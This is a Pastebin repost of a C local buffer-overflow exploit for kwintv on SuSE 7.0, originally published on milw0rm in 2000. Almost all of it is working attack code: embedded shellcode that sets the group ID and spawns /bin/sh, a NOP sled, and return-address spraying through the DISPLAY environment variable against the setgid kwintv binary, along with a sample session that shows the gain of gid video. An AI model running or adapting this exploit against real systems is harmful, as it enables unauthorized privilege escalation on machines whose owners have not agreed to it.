Advertisement
FlyFar

Kwintv - Local Buffer Overflow

Apr 26th, 2024
858
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 2.29 KB | Cybersecurity | 0 0
  1. /*
  2.  * (kwintv) local buffer overflow. (gid=video(33))
  3.  *
  4.  * Author: Cody Tubbs (loophole of hhp).
  5.  * www.hhp-programming.net / pigspigs@yahoo.com
  6.  * 12/17/2000
  7.  *
  8.  * For SuSE 7.0 - x86.
  9.  * sgid "video"(33) by default.
  10.  *
  11.  * bash-2.04$ id
  12.  * uid=1000(loophole) gid=501(noc)
  13.  * bash-2.04$ ./b 0
  14.  * Ret-addr 0xbfffe1fc, offset: 0, allign: 0.
  15.  * sh-2.04$ id
  16.  * uid=1000(loophole) gid=33(video)
  17.  * sh-2.04$
  18.  *
  19.  */
  20.  
  21. #include <stdio.h>
  22.  
  23. #define OFFSET 0
  24. #define ALLIGN 0
  25. #define NOP    0x90
  26. #define DBUF   481 //481+((RET)).
  27. #define GID    33
  28.  
  29. static char shellcode[]=
  30.   "\x31\xdb\x31\xc9\xbb\xff\xff\xff\xff\xb1\x00\x31\xc0"
  31.   "\xb0\x47\xcd\x80\x31\xdb\x31\xc9\xb3\x00\xb1\x00\x31"
  32.   "\xc0\xb0\x47\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0"
  33.   "\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08"
  34.   "\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8"
  35.   "\xdc\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x69";
  36.  
  37. long get_sp(void){
  38.   __asm__("movl %esp,%eax");
  39. }
  40.  
  41. void workit(char *heh){
  42.   fprintf(stderr, "\n(kwintv) local exploit for SuSE 7.0 - x86\n");
  43.   fprintf(stderr, "Author: Cody Tubbs (loophole of hhp)\n\n");
  44.   fprintf(stderr, "Usage: %s <offset> [allign(0..3)]\n", heh);
  45.   fprintf(stderr, "Examp: %s 0\n", heh);
  46.   fprintf(stderr, "Examp: %s 0 1\n", heh);
  47.   exit(1);
  48. }
  49.  
  50.  
  51. main(int argc, char **argv){
  52.   char eipeip[DBUF], buffer[4096], heh[DBUF+1];
  53.   int i, offset, gid, allign;
  54.   long address;
  55.  
  56.   if(argc<2){
  57.     workit(argv[0]);
  58.   }
  59.  
  60.   if(argc>1){offset=atoi(argv[1]);}else{offset=OFFSET;}
  61.   if(argc>2){allign=atoi(argv[2]);}else{allign=ALLIGN;}
  62.  
  63.   address=get_sp()-offset;
  64.  
  65.   if(allign>0){for(i=0;i<allign;i++){eipeip[i]=0x69;}}//0x69.HEH.:D
  66.   for(i=allign;i<DBUF;i+=4){*(long *)&eipeip[i]=address;}
  67.  
  68.   gid=GID;
  69.   shellcode[10]=gid;
  70.   shellcode[22]=gid;
  71.   shellcode[24]=gid;
  72.  
  73.   for(i=0;i<(4096-strlen(shellcode)-strlen(eipeip));i++){
  74.     buffer[i]=NOP;
  75.   }
  76.  
  77.   memcpy(heh, eipeip, strlen(eipeip));
  78.   memcpy(heh, "DISPLAY=", 8);
  79.   putenv(heh);
  80.  
  81.   memcpy(buffer+i, shellcode, strlen(shellcode));
  82.   memcpy(buffer, "KWINEX=", 7);
  83.   putenv(buffer);
  84.  
  85.   fprintf(stderr, "Ret-addr %#x, offset: %d, allign: %d.\n",address,offset,allign);
  86.   execlp("/opt/kde/bin/kwintv", "kwintv", 0);//Change path if needed. :D
  87. }
  88.  
  89.  
  90. // milw0rm.com [2000-12-06]
  91.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement